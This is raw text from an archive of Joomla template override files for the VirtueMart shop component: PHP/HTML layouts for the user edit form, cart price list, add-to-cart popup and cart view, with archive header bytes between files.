    <div style="position:relative;margin:20px auto;" class="row-fluid clearfix">
    <div class="centered">
        <button class="btn btn-primary" type="submit" onclick="javascript:return myValidator(userForm, true);" ><?php echo $this->button_lbl ?></button>&nbsp;<button class="btn btn-dark" type="reset" onclick="window.location.href='<?php echo JRoute::_('index.php?option=com_virtuemart&view=user', FALSE); ?>'" ><?php echo vmText::_('COM_VIRTUEMART_CANCEL'); ?></button>
    </div>
    </div>
<?php } ?>
<input type="hidden" name="task" value="saveUser" />
<input type="hidden" name="address_type" value="<?php echo $this->address_type; ?>"/>


PK!T���PP&flex/html/com_virtuemart/user/edit.phpnu&1i�<?php
/**
*
* Modify user form view
*
* @package	VirtueMart
* @subpackage User
* @author Oscar van Eijk
* @link https://virtuemart.net
* @copyright Copyright (c) 2004 - 2010 VirtueMart Team. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
* VirtueMart is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* @version $Id: edit.php 9523 2017-05-04 10:23:55Z Milbo $
*/

// Check to ensure this file is included in Joomla!
defined('_JEXEC') or die('Restricted access');

// Implement Joomla's form validation
vmJsApi::vmValidator();
vmJsApi::css('vmpanels'); // VM_THEMEURL
?>

<?php
$url = vmURI::getCurrentUrlBy('request');
$cancelUrl = JRoute::_($url.'&task=cancel');
?>

<h1><?php echo $this->page_title ?></h1>
<?php echo shopFunctionsF::getLoginForm(false,false); ?>

<?php if($this->userDetails->virtuemart_user_id==0) {
	echo '<h2>'.vmText::_('COM_VIRTUEMART_YOUR_ACCOUNT_REG').'</h2>';
}

?>
<form method="post" id="adminForm" name="userForm" action="<?php echo $url ?>" class="form-validate edit-shopper-form">
<?php if($this->userDetails->user_is_vendor){ ?>
    <div style="margin:10px 0 0;" class="buttonBar-right">
	<button class="btn sppb-btn-primary" type="submit" onclick="javascript:return myValidator(userForm, true);" ><?php echo $this->button_lbl ?></button><button class="btn sppb-btn-dark" type="reset" onclick="window.location.href='<?php echo $cancelUrl ?>'" ><?php echo vmText::_('COM_VIRTUEMART_CANCEL'); ?></button></div>
    <?php } ?>
<?php // Loading Templates in Tabs
if($this->userDetails->virtuemart_user_id!=0) {
    $tabarray = array();

    $tabarray['shopper'] = 'COM_VIRTUEMART_SHOPPER_FORM_LBL';

	if(!empty($this->manage_link)) {
		echo '<div class="btn sppb-btn-default">' . $this->manage_link . '</div>';
	}

	if(!empty($this->add_product_link)) {
		echo '<div class="btn sppb-btn-default">' . $this->add_product_link . '</div>';
	}
	

	if($this->userDetails->user_is_vendor){
		//echo '<hr />';
		$tabarray['vendor'] = 'COM_VIRTUEMART_VENDOR';
	}

    //$tabarray['user'] = 'COM_VIRTUEMART_USER_FORM_TAB_GENERALINFO';
    if (!empty($this->shipto)) {
	    $tabarray['shipto'] = 'COM_VIRTUEMART_USER_FORM_ADD_SHIPTO_LBL';
    }
    if (($_ordcnt = count($this->orderlist)) > 0) {
	    $tabarray['orderlist'] = 'COM_VIRTUEMART_YOUR_ORDERS';
    }

    shopFunctionsF::buildTabs ( $this, $tabarray);

 } else {
    echo $this->loadTemplate ( 'shopper' );
	echo $this->captcha;
	// captcha addition
	/*if(VmConfig::get ('reg_captcha')){
		JHTML::_('behavior.framework');
		JPluginHelper::importPlugin('captcha');
		$dispatcher = JDispatcher::getInstance(); $dispatcher->trigger('onInit','dynamic_recaptcha_1');
		?>
		<div id="dynamic_recaptcha_1"></div>
		<?php
	}*/
 }

// end of captcha addition
?>
<input type="hidden" name="option" value="com_virtuemart" />
<input type="hidden" name="controller" value="user" />
<?php echo JHtml::_( 'form.token' ); ?>
</form>

PK!<���pDpD3flex/html/com_virtuemart/cart/default_pricelist.phpnu&1i�
<fieldset style="width:100%!important;margin:0 auto;padding:0;" class="vm-fieldset-pricelist">
<table class="cart-summary table table-condensed">
<tr>
	<th class="vm-cart-item-name"><?php echo vmText::_ ('COM_VIRTUEMART_CART_NAME') ?></th>
	<th class="vm-cart-item-sku"><?php echo vmText::_ ('COM_VIRTUEMART_CART_SKU') ?></th>
	<th	class="vm-cart-item-basicprice"><?php echo vmText::_ ('COM_VIRTUEMART_CART_PRICE') ?></th>
	<th	class="vm-cart-item-quantity"><?php echo vmText::_ ('COM_VIRTUEMART_CART_QUANTITY') ?></th>

	<?php if (VmConfig::get ('show_tax')) {
		$tax = vmText::_ ('COM_VIRTUEMART_CART_SUBTOTAL_TAX_AMOUNT');
		if(!empty($this->cart->cartData['VatTax'])){
			if(count($this->cart->cartData['VatTax']) < 2) {
				reset($this->cart->cartData['VatTax']);
				$taxd = current($this->cart->cartData['VatTax']);
				$tax = shopFunctionsF::getTaxNameWithValue($taxd['calc_name'],$taxd['calc_value']);
			}
		 }
		?>
	<th class="vm-cart-item-tax"><?php echo "<span class='priceColor2'>" . $tax . '</span>' ?></th>
	<?php
	} ?>
	<th class="vm-cart-item-discount"><?php echo vmText::_ ('COM_VIRTUEMART_CART_SUBTOTAL_DISCOUNT_AMOUNT'); ?></th>
	<th class="vm-cart-item-total" ><?php echo vmText::_ ('COM_VIRTUEMART_CART_TOTAL') ?></th>
</tr>
<?php
$i = 1;
foreach ($this->cart->products as $pkey => $prow) {
	$prow->prices = array_merge($prow->prices,$this->cart->cartPrices[$pkey]);
?>
<tr style="vertical-align:top" class="sectiontableentry<?php echo $i; if(!empty($prow->class)) echo ' '.$prow->class ?> responsive-xs">
	<input type="hidden" name="cartpos[]" value="<?php echo $pkey ?>">
	<td class="responsive-xs">
    <div class="row-fluid">
		<?php if ($prow->virtuemart_media_id) { ?>
		<div class="cart-images col-md-12 col-lg-5 centered">
			<?php
            if (!empty($prow->images[0])) {
                echo $prow->images[0]->displayMediaThumb ('class="img-responsive center-block"', FALSE);
            }
            ?>
        </div>
		<?php } ?>
		<?php echo JHtml::link ($prow->url, $prow->product_name);
			echo '<div class="clearfix centered">' . $this->customfieldsModel->CustomsFieldCartDisplay ($prow) . '</div>';
		 ?>
	</div>
	</td>
	<td class="vm-cart-item-sku responsive-sm responsive-xs"><?php  echo $prow->product_sku ?></td>
	<td class="vm-cart-item-basicprice responsive-sm responsive-xs">
		<?php
		if (VmConfig::get ('checkout_show_origprice', 1) && $prow->prices['discountedPriceWithoutTax'] != $prow->prices['priceWithoutTax']) {
			echo '<span class="line-through">' . $this->currencyDisplay->createPriceDiv ('basePriceVariant', '', $prow->prices, TRUE, FALSE) . '</span>';
		}

		if ($prow->prices['discountedPriceWithoutTax']) {
			echo $this->currencyDisplay->createPriceDiv ('discountedPriceWithoutTax', '', $prow->prices, FALSE, FALSE, 1.0, false, true);
		} else {
			echo $this->currencyDisplay->createPriceDiv ('basePriceVariant', '', $prow->prices, FALSE, FALSE, 1.0, false, true);
		}
		?>
	</td>
	<td class="vm-cart-item-quantity responsive-sm responsive-xs"><?php

				if ($prow->step_order_level)
					$step=$prow->step_order_level;
				else
					$step=1;
				if($step==0)
					$step=1;
				?>
           <div class="row-fluid input-append">
		   		<input type="text"
				   onblur="Virtuemart.checkQuantity(this,<?php echo $step?>,'<?php echo vmText::_ ('COM_VIRTUEMART_WRONG_AMOUNT_ADDED',true)?>');"
				   onclick="Virtuemart.checkQuantity(this,<?php echo $step?>,'<?php echo vmText::_ ('COM_VIRTUEMART_WRONG_AMOUNT_ADDED',true)?>');"
				   onchange="Virtuemart.checkQuantity(this,<?php echo $step?>,'<?php echo vmText::_ ('COM_VIRTUEMART_WRONG_AMOUNT_ADDED',true)?>');"
				   onsubmit="Virtuemart.checkQuantity(this,<?php echo $step?>,'<?php echo vmText::_ ('COM_VIRTUEMART_WRONG_AMOUNT_ADDED',true)?>');"
				   title="<?php echo  vmText::_('COM_VIRTUEMART_CART_UPDATE') ?>" class="quantity-input js-recalculate xs-cart-btn" size="3" maxlength="4" name="quantity[<?php echo $pkey; ?>]" value="<?php echo $prow->quantity ?>" />
                <button type="submit" class="btn vmicon vm2-add_quantity_cart xs-cart-btn" name="updatecart.<?php echo $pkey ?>" title="<?php echo  vmText::_ ('COM_VIRTUEMART_CART_UPDATE') ?>"><i class="fa fa-refresh"></i></button>
				<button type="submit" class="btn vmicon vm2-remove_from_cart xs-cart-btn" name="delete.<?php echo $pkey ?>" title="<?php echo vmText::_ ('COM_VIRTUEMART_CART_DELETE') ?>"><i class="fa fa-times"></i></button>
       </div>
	</td>
	<?php if (VmConfig::get ('show_tax')) { ?>
	<td class="vm-cart-item-tax responsive-sm responsive-xs"><?php echo "<span class='priceColor2'>" . $this->currencyDisplay->createPriceDiv ('taxAmount', '', $prow->prices, FALSE, FALSE, $prow->quantity, false, true) . "</span>" ?></td>
	<?php } ?>
	<td class="vm-cart-item-discount responsive-sm responsive-xs"><?php echo "<span class='priceColor2'>" . $this->currencyDisplay->createPriceDiv ('discountAmount', '', $prow->prices, FALSE, FALSE, $prow->quantity, false, true) . "</span>" ?></td>
	<td class="vm-cart-item-total responsive-sm responsive-xs">
		<?php //vmdebug('hm',$prow->prices,$this->cart->cartPrices[$pkey]);
		if (VmConfig::get ('checkout_show_origprice', 1) && !empty($prow->prices['basePriceWithTax']) && $prow->prices['basePriceWithTax'] != $prow->prices['salesPrice']) {
			echo '<span class="line-through">' . $this->currencyDisplay->createPriceDiv ('basePriceWithTax', '', $prow->prices, TRUE, FALSE, $prow->quantity) . '</span>';
		}
		elseif (VmConfig::get ('checkout_show_origprice', 1) && empty($prow->prices['basePriceWithTax']) && !empty($prow->prices['basePriceVariant']) && $prow->prices['basePriceVariant'] != $prow->prices['salesPrice']) {
			echo '<span class="line-through">' . $this->currencyDisplay->createPriceDiv ('basePriceVariant', '', $prow->prices, TRUE, FALSE, $prow->quantity) . '</span>';
		}
		echo $this->currencyDisplay->createPriceDiv ('salesPrice', '', $prow->prices, FALSE, FALSE, $prow->quantity) ?></td>
</tr>
	<?php
	$i = ($i==1) ? 2 : 1;
} ?>
<!--Begin of SubTotal, Tax, Shipment, Coupon Discount and Total listing -->
<?php if (VmConfig::get ('show_tax')) {
	$colspan = 3;
} else {
	$colspan = 2;
} ?>

<tr class="sectiontableentry1 responsive-xs">
	<td colspan="4" align="center" class="responsive-sm responsive-xs"><?php echo vmText::_ ('COM_VIRTUEMART_ORDER_PRINT_PRODUCT_PRICES_TOTAL'); ?></td>

	<?php if (VmConfig::get ('show_tax')) { ?>
	<td class="responsive-xs" align="right"><?php echo "<span  class='priceColor2'>" . $this->currencyDisplay->createPriceDiv ('taxAmount', '', $this->cart->cartPrices, FALSE, false, true) . "</span>" ?></td>
	<?php } ?>
	<td class="responsive-xs" align="right"><?php echo "<span  class='priceColor2'>" . $this->currencyDisplay->createPriceDiv ('discountAmount', '', $this->cart->cartPrices, FALSE) . "</span>" ?></td>
	<td class="responsive-xs" align="right"><?php echo $this->currencyDisplay->createPriceDiv ('salesPrice', '', $this->cart->cartPrices, FALSE) ?></td>
</tr>

<?php
// Coupon
if (VmConfig::get ('coupons_enable')) { ?>
<tr class="sectiontableentry2">
	<td colspan="4" style="text-align: left;">
		<?php if (!empty($this->layoutName) && $this->layoutName == $this->cart->layout) {
		echo $this->loadTemplate ('coupon');
		} ?>
		<?php if (!empty($this->cart->cartData['couponCode'])) { ?>
		<?php
		echo $this->cart->cartData['couponCode'];
		echo $this->cart->cartData['couponDescr'] ? (' (' . $this->cart->cartData['couponDescr'] . ')') : '';
		?>
	</td>
	<?php if (VmConfig::get ('show_tax')) { ?>
	<td class="responsive-xs" align="right"><?php echo $this->currencyDisplay->createPriceDiv ('couponTax', '', $this->cart->cartPrices['couponTax'], FALSE); ?> </td>
	<?php } ?>
	<td class="responsive-xs" align="right">&nbsp;</td>
	<td class="responsive-xs" align="right"><?php echo $this->currencyDisplay->createPriceDiv ('salesPriceCoupon', '', $this->cart->cartPrices['salesPriceCoupon'], FALSE); ?> </td>
	<?php } else { ?>
	&nbsp;</td>
	<td class="responsive-xs" colspan="<?php echo $colspan ?>">&nbsp;</td>
	<?php }	?>
</tr>
<?php } 
foreach ($this->cart->cartData['DBTaxRulesBill'] as $rule) {
	?>
<tr class="sectiontableentry<?php echo $i ?>">
	<td class="responsive-xs" colspan="6" align="right"><?php echo $rule['calc_name'] ?> </td>

	<?php if (VmConfig::get ('show_tax')) { ?>
	<td class="responsive-xs" align="right"></td>
	<?php } ?>
	<td class="responsive-xs" align="right"><?php echo $this->currencyDisplay->createPriceDiv ($rule['virtuemart_calc_id'] . 'Diff', '', $this->cart->cartPrices[$rule['virtuemart_calc_id'] . 'Diff'], FALSE); ?></td>
	<td class="responsive-xs" align="right"><?php echo $this->currencyDisplay->createPriceDiv ($rule['virtuemart_calc_id'] . 'Diff', '', $this->cart->cartPrices[$rule['virtuemart_calc_id'] . 'Diff'], FALSE); ?> </td>
</tr>
	<?php
	if ($i) {
		$i = 1;
	} else {
		$i = 0;
	}
} ?>

<?php

foreach ($this->cart->cartData['taxRulesBill'] as $rule) {
	if($rule['calc_value_mathop']=='avalara') continue;
	?>
<tr class="sectiontableentry<?php echo $i ?>">
	<td class="responsive-xs" colspan="4" align="right"><?php echo $rule['calc_name'] ?> </td>
	<?php if (VmConfig::get ('show_tax')) { ?>
	<td class="responsive-xs" align="right"><?php echo $this->currencyDisplay->createPriceDiv ($rule['virtuemart_calc_id'] . 'Diff', '', $this->cart->cartPrices[$rule['virtuemart_calc_id'] . 'Diff'], FALSE); ?> </td>
	<?php } ?>
	<td class="responsive-xs" align="right"><?php ?> </td>
	<td class="responsive-xs" align="right"><?php echo $this->currencyDisplay->createPriceDiv ($rule['virtuemart_calc_id'] . 'Diff', '', $this->cart->cartPrices[$rule['virtuemart_calc_id'] . 'Diff'], FALSE); ?> </td>
</tr>
	<?php
	if ($i) {
		$i = 1;
	} else {
		$i = 0;
	}
}

foreach ($this->cart->cartData['DATaxRulesBill'] as $rule) {
	?>
<tr class="sectiontableentry<?php echo $i ?>">
	<td class="responsive-xs" colspan="4" align="right"><?php echo   $rule['calc_name'] ?> </td>

	<?php if (VmConfig::get ('show_tax')) { ?>
	<td align="right"></td>

	<?php } ?>
	<td class="responsive-xs" align="right"><?php echo $this->currencyDisplay->createPriceDiv ($rule['virtuemart_calc_id'] . 'Diff', '', $this->cart->cartPrices[$rule['virtuemart_calc_id'] . 'Diff'], FALSE); ?>  </td>
	<td class="responsive-xs" align="right"><?php echo $this->currencyDisplay->createPriceDiv ($rule['virtuemart_calc_id'] . 'Diff', '', $this->cart->cartPrices[$rule['virtuemart_calc_id'] . 'Diff'], FALSE); ?> </td>
</tr>
	<?php
	if ($i) {
		$i = 1;
	} else {
		$i = 0;
	}
}

if (VmConfig::get('oncheckout_opc',true) or
	!VmConfig::get('oncheckout_show_steps',false) or
	(!VmConfig::get('oncheckout_opc',true) and VmConfig::get('oncheckout_show_steps',false) and
	!empty($this->cart->virtuemart_shipmentmethod_id) )
) { ?>
<tr class="sectiontableentry1" style="vertical-align:top;">
	<?php if (!$this->cart->automaticSelectedShipment) { ?>
		<td class="responsive-xs" colspan="4" style="vertical-align:top;">
			<?php
				echo '<h4>'.vmText::_ ('COM_VIRTUEMART_CART_SELECTED_SHIPMENT').'</h4>';
				echo '<div class="selected_shipment">'.$this->cart->cartData['shipmentName'].'</div><hr />';

		if (!empty($this->layoutName) and $this->layoutName == $this->cart->layout) {
			if (VmConfig::get('oncheckout_opc', 0)) {
				$previouslayout = $this->setLayout('select');
				echo '<div class="col-md-offset-2 col-md-8 col-md-8 col-md-offset-2">'.$this->loadTemplate('shipment').'</div>';
				$this->setLayout($previouslayout);
			} else {
				echo JHtml::_('link', JRoute::_('index.php?option=com_virtuemart&view=cart&task=edit_shipment', $this->useXHTML, $this->useSSL), $this->select_shipment_text, 'class="centered"');
			}
		} else {
			echo vmText::_ ('COM_VIRTUEMART_CART_SHIPPING');
		}
		echo '</td>';
	} else {
	?>
	<td class="responsive-xs" colspan="4" style="vertical-align:top;">
		<?php echo '<h4>'.vmText::_ ('COM_VIRTUEMART_CART_SELECTED_SHIPMENT').'</h4>'; ?>
		<?php echo $this->cart->cartData['shipmentName'];
		echo '<span class="floatright">' . $this->currencyDisplay->createPriceDiv ('shipmentValue', '', $this->cart->cartPrices['shipmentValue'], FALSE) . '</span>';
		?>
	</td>
	<?php } ?>

	<?php if (VmConfig::get ('show_tax')) { ?>
	<td class="responsive-xs" align="right"><?php

	echo "<span class='priceColor2'>" . $this->currencyDisplay->createPriceDiv ('shipmentTax', '', $this->cart->cartPrices['shipmentTax'], FALSE) . "</span>"; ?> </td>
	<?php } ?>
	<td class="responsive-xs" align="right"><?php if($this->cart->cartPrices['salesPriceShipment'] < 0) echo $this->currencyDisplay->createPriceDiv ('salesPriceShipment', '', $this->cart->cartPrices['salesPriceShipment'], FALSE); ?></td>
	<td class="responsive-xs" align="right"><?php echo $this->currencyDisplay->createPriceDiv ('salesPriceShipment', '', $this->cart->cartPrices['salesPriceShipment'], FALSE); ?> </td>
</tr>
<?php } ?>
<?php if ($this->cart->pricesUnformatted['salesPrice']>0.0 and
	( 	VmConfig::get('oncheckout_opc',true) or
		!VmConfig::get('oncheckout_show_steps',false) or
		( (!VmConfig::get('oncheckout_opc',true) and VmConfig::get('oncheckout_show_steps',false) ) and !empty($this->cart->virtuemart_paymentmethod_id))
	)
) { ?>
<tr class="sectiontableentry1" style="vertical-align:top;">
	<?php if (!$this->cart->automaticSelectedPayment) { ?>
		<td class="responsive-xs" colspan="4" style="align:left;vertical-align:top;">
			<?php
				echo '<h4 class="select_payment">'.vmText::_ ('COM_VIRTUEMART_CART_SELECTED_PAYMENT').'</h4>';
				echo '<div class="selected_payment">'.$this->cart->cartData['paymentName'].'</div>';
				echo '<hr />';

		if (!empty($this->layoutName) && $this->layoutName == 'default') {
			if (VmConfig::get('oncheckout_opc', 0)) {
				$previouslayout = $this->setLayout('select');
				echo $this->loadTemplate('payment');
				//echo '<div class="col-md-offset-2 col-sm-8 col-md-offset-2">'.$this->loadTemplate('payment').'</div>';
				$this->setLayout($previouslayout);
			} else {
				echo JHtml::_('link', JRoute::_('index.php?option=com_virtuemart&view=cart&task=editpayment', $this->useXHTML, $this->useSSL), $this->select_payment_text, 'class=""');
			}
		} else {
		echo vmText::_ ('COM_VIRTUEMART_CART_PAYMENT');
	} ?> </td>

	<?php } else { ?>
		<td class="responsive-xs" colspan="4" style="align:left;vertical-align:top;" >
			<?php echo '<h4>'.vmText::_ ('COM_VIRTUEMART_CART_SELECTED_PAYMENT').'</h4>'; ?>
			<?php echo $this->cart->cartData['paymentName']; ?> </td>
	<?php } ?>
	<?php if (VmConfig::get ('show_tax')) { ?>
	<td class="responsive-xs" align="right"><?php echo "<span  class='priceColor2'>" . $this->currencyDisplay->createPriceDiv ('paymentTax', '', $this->cart->cartPrices['paymentTax'], FALSE) . "</span>"; ?> </td>
	<?php } ?>
	<td class="responsive-xs" align="right" ><?php if($this->cart->cartPrices['salesPricePayment'] < 0) echo $this->currencyDisplay->createPriceDiv ('salesPricePayment', '', $this->cart->cartPrices['salesPricePayment'], FALSE); ?></td>
	<td class="responsive-xs" align="right" ><?php  echo $this->currencyDisplay->createPriceDiv ('salesPricePayment', '', $this->cart->cartPrices['salesPricePayment'], FALSE); ?> </td>
</tr>
<?php  } ?>

<tr class="sectiontableentry2 svgwhite">
	<td class="responsive-xs" colspan="4" align="right"><?php echo vmText::_ ('COM_VIRTUEMART_CART_TOTAL') ?>:</td>

	<?php if (VmConfig::get ('show_tax')) { ?>
	<td class="responsive-xs" align="right"> <?php echo "<span  class='priceColor2'>" . $this->currencyDisplay->createPriceDiv ('billTaxAmount', '', $this->cart->cartPrices['billTaxAmount'], FALSE) . "</span>" ?> </td>
	<?php } ?>
	<td class="responsive-xs" align="right"> <?php echo "<span  class='priceColor2'>" . $this->currencyDisplay->createPriceDiv ('billDiscountAmount', '', $this->cart->cartPrices['billDiscountAmount'], FALSE) . "</span>" ?> </td>
	<td class="responsive-xs" align="right"><strong><?php echo $this->currencyDisplay->createPriceDiv ('billTotal', '', $this->cart->cartPrices['billTotal'], FALSE); ?></strong></td>
</tr>
<?php
if ($this->totalInPaymentCurrency) {
?>

<tr class="sectiontableentry2">
	<td colspan="4" align="right"><?php echo vmText::_ ('COM_VIRTUEMART_CART_TOTAL_PAYMENT') ?>:</td>

	<?php if (VmConfig::get ('show_tax')) { ?>
	<td></td>
	<?php } ?>
	<td class="responsive-xs" align="right"></td>
	<td class="responsive-xs" align="right"><strong><?php echo $this->totalInPaymentCurrency; ?></strong></td>
</tr>
	<?php
}

//Show VAT tax seperated
if(!empty($this->cart->cartData)){
	if(!empty($this->cart->cartData['VatTax'])){
		$c = count($this->cart->cartData['VatTax']);
		if (!VmConfig::get ('show_tax') or $c>1) {
			if($c>0){
				?><tr class="sectiontableentry2">
				<td class="responsive-xs" colspan="5" align="right"><?php echo vmText::_ ('COM_VIRTUEMART_TOTAL_INCL_TAX') ?></td>

				<?php if (VmConfig::get ('show_tax')) { ?>
					<td class="responsive-xs"></td>
				<?php } ?>
				<td class="responsive-xs"></td>
				</tr><?php
			}
			foreach( $this->cart->cartData['VatTax'] as $vatTax ) {
				if(!empty($vatTax['result'])) {
					echo '<tr class="responsive-xs sectiontableentry'.$i.'">';
					echo '<td class="responsive-xs" colspan="4" align="right">'.shopFunctionsF::getTaxNameWithValue($vatTax['calc_name'],$vatTax['calc_value']). '</td>';
					echo '<td class="responsive-xs" align="right"><span class="priceColor2">'.$this->currencyDisplay->createPriceDiv( 'taxAmount', '', $vatTax['result'], FALSE, false, 1.0,false,true ).'</span></td>';
					echo '<td></td><td></td>';
					echo '</tr>';
				}
			}
		}
	}
}
?>
 </table>
</fieldset>PK!UʉHii(flex/html/com_virtuemart/cart/padded.phpnu&1i�<?php
/**
*
* Layout for the add to cart popup
*
* @package	VirtueMart
* @subpackage Cart
* @author Max Milbers
*
* @link http://www.virtuemart.net
* @copyright Copyright (c) 2013 VirtueMart Team. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
* VirtueMart is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* @version $Id: cart.php 2551 2010-09-30 18:52:40Z milbo $
*/

// Check to ensure this file is included in Joomla!
defined('_JEXEC') or die('Restricted access');

$media_model 	= VmModel::getModel('media');
$product_model 	= VmModel::getModel('product');

if (!class_exists('CurrencyDisplay')) require(VMPATH_ADMIN . DS . 'helpers' . DS . 'currencydisplay.php');
$currency = CurrencyDisplay::getInstance( );

?>

<!-- popup cart -->
<div class="popup-cart"> 

	<?php if($this->products){ ?>
	<h3 class="title"><?php echo JText::_('VM_POPUP_PRODUCT_ADDED_SUCCESS'); ?> 
		<span><?php echo JText::_('VM_POPUP_YOUR_SH0PPING_CART'); ?></span>
	</h3>
	
	<div class="item-wrap">
	<?php foreach($this->products as $product){
			if($product->quantity>0){
				$images  = $media_model->createMediaByIds($product->virtuemart_media_id, $product->quantity); 
				$prices  = $product_model->getPrice($product->virtuemart_product_id, 1);
				?>
				<div class="col-sm-5">
					<?php if(isset($images[0]) && $images[0]) {
						echo $images[0]->displayMediaThumb ('class="ProductImage"', FALSE); 
					} ?>	
				</div> <!-- /.col-sm-5 -->
				<div class="col-sm-7">
					<h3 class="item-name"><?php echo $product->product_name; ?></h3>
					<div class="vm-price-box">
						<?php if ( isset($product->allPrices[0]['product_override_price']) && round($product->allPrices[0]['product_override_price']) != 0) { ?>
	                    	<ins>
				                <?php echo $currency->createPriceDiv ('salesPrice', '', $prices, FALSE, FALSE, 1.0, TRUE); ?>
                                <?php echo $currency->createPriceDiv ('salesPriceTt', '', $prices, FALSE, FALSE, 1.0, TRUE); ?>
				            </ins>
				            <del>    
				                <?php echo $currency->createPriceDiv ('basePriceVariant', '', $prices, FALSE, FALSE, 1.0, TRUE); ?>
				            </del>
                    	<?php } else{ ?>
                    		<ins>
				                <?php echo $currency->createPriceDiv ('salesPrice', '', $prices, FALSE, FALSE, 1.0, TRUE); ?>
                                <?php echo $currency->createPriceDiv ('salesPriceTt', '', $prices, FALSE, FALSE, 1.0, TRUE); ?>
				            </ins>
                    	<?php } ?>
					</div>
					<p class="popup-cart-product-quantity">
						<span><?php echo JText::_('VM_POPUP_SH0PPING_CART_QUANTITY'); ?> </span>
						<span class="badge"><?php echo $product->quantity; ?></span>
					</p>
				</div> <!-- /.col-sm-7 -->
			<?php } else { 
				if(!empty($product->errorMsg)){ ?>
					<div><?php echo $product->errorMsg ?></div>
				<?php } // !empty($product->errorMsg)
			} // else

		} // END:: foreach
	} // has product ?>
	</div> <!-- //item-wrap -->
    <div class="clear"></div>

	<div class="button-group row">
		<a class="continue_link button" href="<?php echo $this->continue_link; ?>" >
			<?php echo vmText::_('COM_VIRTUEMART_CONTINUE_SHOPPING'); ?> 
		</a>
		<a class="showcart floatright" href="<?php echo  $this->cart_link; ?>">
			<?php echo vmText::_('VM_CART_SHOW_TITLE'); ?>
		</a>
	</div> <!-- //button-group -->

</div> <!-- //.popup-cart -->
<br style="clear:both">
PK!�����)flex/html/com_virtuemart/cart/default.phpnu&1i�<?php
/**
 *
 * Layout for the shopping cart
 *
 * @package    VirtueMart
 * @subpackage Cart
 * @author Max Milbers
 *
 * @link https://virtuemart.net
 * @copyright Copyright (c) 2004 - 2016 VirtueMart Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 * VirtueMart is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 * @version $Id: cart.php 2551 2010-09-30 18:52:40Z milbo $
 */

// Check to ensure this file is included in Joomla!
defined ('_JEXEC') or die('Restricted access');

vmJsApi::vmValidator();

?>
<div id="cart-view" class="cart-view">
	<div class="vm-cart-header-container">
		<div class="width50 floatleft vm-cart-header">
			<h1><?php echo vmText::_ ('COM_VIRTUEMART_CART_TITLE'); ?></h1>
			<div class="payments-signin-button"></div>
		</div>
		<?php if (VmConfig::get ('oncheckout_show_steps', 1) ){
            if($this->checkout_task == 'checkout') {
                echo '<div class="checkoutStep" id="checkoutStep1">' . vmText::_ ('COM_VIRTUEMART_USER_FORM_CART_STEP1') . '</div>';
            } else { //if($this->checkout_task == 'confirm') {
                echo '<div class="checkoutStep" id="checkoutStep4">' . vmText::_ ('COM_VIRTUEMART_USER_FORM_CART_STEP4') . '</div>';
            }
        }  ?>
        <div class="width50 floatleft right vm-continue-shopping">
                <?php // Continue Shopping Button
                if (!empty($this->continue_link_html)) { ?>
                    <span class="btn-continue"><i class="pe pe-7s-refresh"></i><?php echo $this->continue_link_html; ?> </span>
                <?php } ?>
        </div>
        <div class="clear"></div>
	</div>


	<?php
	$uri = vmUri::getCurrentUrlBy('get');
	$uri = str_replace(array('?tmpl=component','&tmpl=component'),'',$uri);
	echo '<hr />' . shopFunctionsF::getLoginForm ($this->cart, FALSE,$uri) . '<div class="clear"></div>'; 
	
	if (VmConfig::get ('oncheckout_show_register', 1) && !$this->cart->user->virtuemart_user_id) {
		echo '<hr /><div style="padding:3%;" class="jumbotron black_bckg-40 svgwhite"><h4 style="font-size:120%;margin:-3px 0 12px;">'. vmText::_('MOD_NEW_REGISTER') .'</h6><a class="btn btn-primary" href="'. JRoute::_('index.php?option=com_virtuemart&view=user') . '"><i style="font-size:135%;vertical-align:middle;" class="pe pe-7s-user"></i>'. vmText::_('COM_VIRTUEMART_ORDER_REGISTER') .'</a></div><div style="margin:0;padding:0;" class="clear"></div>';
	}

	// This displays the form to change the current shopper
	if ($this->allowChangeShopper and !$this->isPdf){
		echo $this->loadTemplate ('shopperform');
	}


	$taskRoute = '';
	?><form method="post" id="checkoutForm" name="checkoutForm" action="<?php echo JRoute::_ ('index.php?option=com_virtuemart&view=cart' . $taskRoute, $this->useXHTML, $this->useSSL); ?>">
		<?php
		if(!$this->isPdf and VmConfig::get('multixcart')=='byselection'){
			if (!class_exists('ShopFunctions')) require(VMPATH_ADMIN . DS . 'helpers' . DS . 'shopfunctions.php');
			echo shopFunctions::renderVendorFullVendorList($this->cart->vendorId);
			?><input type="submit" name="updatecart" title="<?php echo vmText::_('COM_VIRTUEMART_SAVE'); ?>" value="<?php echo vmText::_('COM_VIRTUEMART_SAVE'); ?>" class="button"  style="margin-left: 10px;"/><?php
		}
		echo $this->loadTemplate ('address');
		// This displays the pricelist MUST be done with tables, because it is also used for the emails
		echo $this->loadTemplate ('pricelist');

		if (!empty($this->checkoutAdvertise)) {
			?> <div id="checkout-advertise-box"> <?php
			foreach ($this->checkoutAdvertise as $checkoutAdvertise) {
				?>
				<div class="checkout-advertise">
					<?php echo $checkoutAdvertise; ?>
				</div>
			<?php
			}
			?></div><?php
		}

		echo $this->loadTemplate ('cartfields');

		?> <div class="checkout-button-top"> <?php
			echo $this->checkout_link_html;
			?></div><div class="clear"></div>

		<?php // Continue and Checkout Button END ?>
		<input type='hidden' name='order_language' value='<?php echo $this->order_language; ?>'/>
		<input type='hidden' name='task' value='updatecart'/>
		<input type='hidden' name='option' value='com_virtuemart'/>
		<input type='hidden' name='view' value='cart'/>
	</form>


<?php

if(VmConfig::get('oncheckout_ajax',false)){
	vmJsApi::addJScript('updDynamicListeners',"
if (typeof Virtuemart.containerSelector === 'undefined') Virtuemart.containerSelector = '#cart-view';
if (typeof Virtuemart.container === 'undefined') Virtuemart.container = jQuery(Virtuemart.containerSelector);

jQuery(document).ready(function() {
	if (Virtuemart.container)
		Virtuemart.updDynFormListeners();
}); ");
}


vmJsApi::addJScript('vm.checkoutFormSubmit',"
Virtuemart.bCheckoutButton = function(e) {
	e.preventDefault();
